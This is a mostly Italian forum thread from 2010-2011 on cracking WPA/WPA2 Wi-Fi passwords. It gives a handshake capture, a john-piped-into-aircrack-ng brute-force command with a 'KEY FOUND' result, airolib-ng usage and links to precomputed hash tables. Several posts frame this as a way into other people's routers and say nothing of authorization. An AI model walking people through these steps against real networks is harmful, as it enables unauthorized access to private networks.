Author Topic: Best way to crack WPA  (Read 22120 times)

ghostdog

  • Guest
on: December 19, 2010, 06:40:59 PM
Hi there

For my experience this is the fastest and the most accurate way to crack WPA , WPA2 ,  we goona use " John " in aid to aircrack to crack the .cap hash.

here is what you do :

1) Capture the 4ways " Handshake "

CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                              
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                              
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  linksys                          
                                                                                                              
  BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                              
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116




2) Open the console and write this:

 ghostdog@backbox:~$ sudo john --incremental:Digits --stdout:8 | sudo aircrack-ng -e linksys -w- ghostdog .cap

Nb: Change the cap file's name to what ever you want and the ESSID to the one you want to crack !

3) If requested enter you Super User password !

4)
                      Aircrack-ng 1.1
 
 
                 [00:00:00] 2 keys tested (37.20 k/s)
 
 
                         KEY FOUND! [ 12345678 ]
 
 
    Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
 
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
 
    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB


ghostdog@backbox:~$

Happy Hacking
GD
« Last Edit: December 19, 2010, 06:55:41 PM by ghostdog »



Diavolo_Rosso

  • Newbie
  • *
  • Posts: 14
    • View Profile
Reply #1 on: December 20, 2010, 10:53:37 PM
Domanda che mi sorge spontanea:

--stdout:8 va impostato cosi perchè la password è di 8 caratteri o va bene in ogni caso?

perchè io ho provato cosi ma la mia chiave wpa mica l'ha beccata...



ghostdog

  • Guest
Reply #2 on: December 20, 2010, 11:01:50 PM
ciao

si , se hai notato bene, la chiave era WPA2 da 8 numeri,

si puo modificare il mumero a seconda della esigenza ! o' puoi modificare la password list di aircrack a una piu ampia con combinazione da 10 e piu .

Recordati che " John" serve solo ad accelerare il processo !



bi7ext

  • Newbie
  • *
  • Posts: 22
    • View Profile
Reply #3 on: January 31, 2011, 06:54:03 PM
Ciao a tutti, innanzitutto porgo i miei complimenti per il forum e ovviamente per la fantastica ditribuzione ;)
Volevo chiedere se qualcuno sa qualcosa su airolib-ng, ho letto che con questo tool si possono precalcolare le Pairwise Master Keys (PMKs) di un file dizionario velocizzando incredibilmente la frequenza di test di chiavi wpa e wpa2.

grazie in anticipo

bi7ext



evilsocket

  • Full Member
  • ***
  • Posts: 177
    • View Profile
    • http://www.emoticode.net
Reply #4 on: January 31, 2011, 07:26:00 PM
Ciao a tutti, innanzitutto porgo i miei complimenti per il forum e ovviamente per la fantastica ditribuzione ;)
Volevo chiedere se qualcuno sa qualcosa su airolib-ng, ho letto che con questo tool si possono precalcolare le Pairwise Master Keys (PMKs) di un file dizionario velocizzando incredibilmente la frequenza di test di chiavi wpa e wpa2.

grazie in anticipo

bi7ext

Ho appena inserito la guida nel wiki
http://wiki.backbox.org/Aircrack-ng.html#Use_airolib-ng_to_generate_precomputed_PMKs
:)
« Last Edit: February 01, 2011, 05:18:10 PM by raffaele »



ghostdog

  • Guest
Reply #5 on: January 31, 2011, 07:30:09 PM
Ciao a tutti, innanzitutto porgo i miei complimenti per il forum e ovviamente per la fantastica ditribuzione ;)
Volevo chiedere se qualcuno sa qualcosa su airolib-ng, ho letto che con questo tool si possono precalcolare le Pairwise Master Keys (PMKs) di un file dizionario velocizzando incredibilmente la frequenza di test di chiavi wpa e wpa2.

grazie in anticipo

bi7ext

Ciao

Certamente, ma " airolib-ng non si limita solo a quello bensi, ha molte altre funzione, esempio, creazione database, calcolare hash per poi passarlo a Cowpatty, misurare le probabilita' di successo asseconda del ESSID . ecc...

un esempio piccolo:

 airolib-ng testdb --stats

il sistema risponde :

statsThere are 2 ESSIDs and 232 passwords in the database. 464 out of 464 possible combinations have been computed (100%).
 
 ESSID   Priority        Done
 Harkonen        64      100.0
 teddy   64      100.0


Comunque airolib-ng viene molto utile nel calcolare il hash per trovare la chiave WPA/WPA2 di default dalla fabbrica, asseconsa del marchio, expl: Netgear, Linksys, ecc....

Ora per scaricare i default hash di tutte le marche disponibili sul mercato, bisogna andare qui : 
LINK : http://torrents.lostboxen.net/cowf-wpa-psk-hash-tables-with-cowpatty-4.0_2006-10-19%3Cbr%3E%3Cbr%3EFor

PS: sono 7gb di hash files  ;)



bi7ext

  • Newbie
  • *
  • Posts: 22
    • View Profile
Reply #6 on: February 01, 2011, 03:57:28 PM
Ciao a tutti, innanzitutto porgo i miei complimenti per il forum e ovviamente per la fantastica ditribuzione ;)
Volevo chiedere se qualcuno sa qualcosa su airolib-ng, ho letto che con questo tool si possono precalcolare le Pairwise Master Keys (PMKs) di un file dizionario velocizzando incredibilmente la frequenza di test di chiavi wpa e wpa2.

grazie in anticipo

bi7ext

Ho appena inserito la guida nel wiki http://wiki.backbox.org/Tools.html#Use_airolib-ng_to_generate_precomputed_PMKs :)

uP! 8)



bi7ext

  • Newbie
  • *
  • Posts: 22
    • View Profile
Reply #7 on: February 01, 2011, 04:11:07 PM
Ciao a tutti, innanzitutto porgo i miei complimenti per il forum e ovviamente per la fantastica ditribuzione ;)
Volevo chiedere se qualcuno sa qualcosa su airolib-ng, ho letto che con questo tool si possono precalcolare le Pairwise Master Keys (PMKs) di un file dizionario velocizzando incredibilmente la frequenza di test di chiavi wpa e wpa2.

grazie in anticipo

bi7ext

Ciao

Certamente, ma " airolib-ng non si limita solo a quello bensi, ha molte altre funzione, esempio, creazione database, calcolare hash per poi passarlo a Cowpatty, misurare le probabilita' di successo asseconda del ESSID . ecc...

un esempio piccolo:

 airolib-ng testdb --stats

il sistema risponde :

statsThere are 2 ESSIDs and 232 passwords in the database. 464 out of 464 possible combinations have been computed (100%).
 
 ESSID   Priority        Done
 Harkonen        64      100.0
 teddy   64      100.0


Comunque airolib-ng viene molto utile nel calcolare il hash per trovare la chiave WPA/WPA2 di default dalla fabbrica, asseconsa del marchio, expl: Netgear, Linksys, ecc....

Ora per scaricare i default hash di tutte le marche disponibili sul mercato, bisogna andare qui : 
LINK : http://torrents.lostboxen.net/cowf-wpa-psk-hash-tables-with-cowpatty-4.0_2006-10-19%3Cbr%3E%3Cbr%3EFor

PS: sono 7gb di hash files  ;)

Grazie della delucidazione, stavo pensando che in ogni caso è più probabile trovare una rete wifi protetta con chiave wpa/2 assegnata dalla fabbrica piuttosto di una personalizzata.. mi sbaglio? solitamente la maggiorparte degli utenti  non sa nemmeno cos'è una chiave wpa. resta il fatto che avventurarsi a trovare pwd da più di 20 caratteri è un suicidio

link non funzionante

bi7ext



ghostdog

  • Guest
Reply #8 on: February 01, 2011, 05:11:09 PM
 :D ciao
scusa per il link, non lo avevo testato, perche' convinto che ancora attivo !

Nuovo Link : http://btjunkie.org/torrent/wpa-psk-h1kari-renderman/378787d4884fcd51a58d0fa601df46d8da84cba69afd

Sicuramente 80% dei routers sono protetti con un default wpa. solitamente, la chiave e' alfanumerico di massimo 12 caratteri, una buona passwordlist e bruteforce attack, va' sempre a buon fine, bisogna solo avere tempo, pazienza, e CPU  ;)



bi7ext

  • Newbie
  • *
  • Posts: 22
    • View Profile
Reply #9 on: February 01, 2011, 07:05:24 PM
:D ciao
scusa per il link, non lo avevo testato, perche' convinto che ancora attivo !

Nuovo Link : http://btjunkie.org/torrent/wpa-psk-h1kari-renderman/378787d4884fcd51a58d0fa601df46d8da84cba69afd

Sicuramente 80% dei routers sono protetti con un default wpa. solitamente, la chiave e' alfanumerico di massimo 12 caratteri, una buona passwordlist e bruteforce attack, va' sempre a buon fine, bisogna solo avere tempo, pazienza, e CPU  ;)

ok, tutto chiaro, grazie per il link! ;) 



bi7ext

  • Newbie
  • *
  • Posts: 22
    • View Profile
Reply #10 on: February 04, 2011, 01:52:46 PM
Ciao, eccomi con un altra domanda  ;D volevo sapere se è possibile conoscere la lunghezza di una chiave wpa/2 partendo dal pcap file..se non fosse possibile ci sono altri modi?

Grazie

bi7ext



ghostdog

  • Guest
Reply #11 on: February 04, 2011, 02:15:15 PM
Ciao, eccomi con un altra domanda  ;D volevo sapere se è possibile conoscere la lunghezza di una chiave wpa/2 partendo dal pcap file..se non fosse possibile ci sono altri modi?

Grazie

bi7ext
Ciao,
Sicuramente, usando Wireshark per analizzare il > cap file , il problema e' che comunque anche sapendo il numero dei caratteri nella password, non sapresti mai se e; composta da numeri o' letter o' peggio " lettere+numeri+simboli", percio' e' una fatica inutile.
Per questo io consiglio di utilizzate wordlists con combinazioni che superano i 10 caratteri.
Ci sono dei metodi per accelerare il processo, abbinando JOHN, a aircrack, O' usare Cuda .
Il bruteforce usando Cowpatty mi ha empre portato risultati, perche usare il Dictionary atack, diventa una questione di fortuna, se la password esiste ne TXT , bene, !!! se no, non puoi farci nulla, invece il Bruteforce, consuma del tempo, ma va' sempre a buon fine  ;)

Consiglio : conta sempre sul fatto che il 90% della gente e' ignorante in materia wifi security, se il ESSID e' il modello del router, allora la password e' : Factory Default, una ricerca su google ti puo aiutare.
 ;) La prima regola nel hacking e' la piu importante: INFORMATION GATHERING  ;)



Emilio

  • Newbie
  • *
  • Posts: 35
    • View Profile
Reply #12 on: February 04, 2011, 02:34:38 PM
Ciao, eccomi con un altra domanda  ;D volevo sapere se è possibile conoscere la lunghezza di una chiave wpa/2 partendo dal pcap file..se non fosse possibile ci sono altri modi?

Naturalmente no : D Sarebbe un information leak pauroso nell'algoritmo di cifratura, ti basterebbe provare tutte le pwd di quella lunghezza diminuendo drasticamente i tempi di attacco, ovvero i criptoanalisti di wpa non avrebbero capito un cazzo. : D

La chiave utilizzata negli algoritmi di cifratura simmetrica sono sempre lunghe gli stessi bit, nei casi in cui tu (utente) puoi inserire password di diversa lunghezza, è solo perchè al momento dell'uso vengono ricondotte alla lunghezza standard con algoritmi tipo PBKDF2. Wikipedia è tua amica:

http://en.wikipedia.org/wiki/Wi-Fi_Protected_Access
http://en.wikipedia.org/wiki/Cipher_block_chaining
http://en.wikipedia.org/wiki/PBKDF2



bi7ext

  • Newbie
  • *
  • Posts: 22
    • View Profile
Reply #13 on: February 04, 2011, 02:44:48 PM
Ciao, eccomi con un altra domanda  ;D volevo sapere se è possibile conoscere la lunghezza di una chiave wpa/2 partendo dal pcap file..se non fosse possibile ci sono altri modi?

Naturalmente no : D Sarebbe un information leak pauroso nell'algoritmo di cifratura, ti basterebbe provare tutte le pwd di quella lunghezza diminuendo drasticamente i tempi di attacco, ovvero i criptoanalisti di wpa non avrebbero capito un cazzo. : D

La chiave utilizzata negli algoritmi di cifratura simmetrica sono sempre lunghe gli stessi bit, nei casi in cui tu (utente) puoi inserire password di diversa lunghezza, è solo perchè al momento dell'uso vengono ricondotte alla lunghezza standard con algoritmi tipo PBKDF2. Wikipedia è tua amica:

http://en.wikipedia.org/wiki/Wi-Fi_Protected_Access
http://en.wikipedia.org/wiki/Cipher_block_chaining
http://en.wikipedia.org/wiki/PBKDF2

Ok, grazie, devo dire che mi hai schiarito le idee!  ;)



ghostdog

  • Guest
Reply #14 on: February 04, 2011, 02:48:40 PM
dai un'occhiata qui, potrebbe darti un idea + chiara:

http://www.xs4all.nl/~rjoris/wpapsk.html
« Last Edit: February 04, 2011, 05:05:12 PM by raffaele »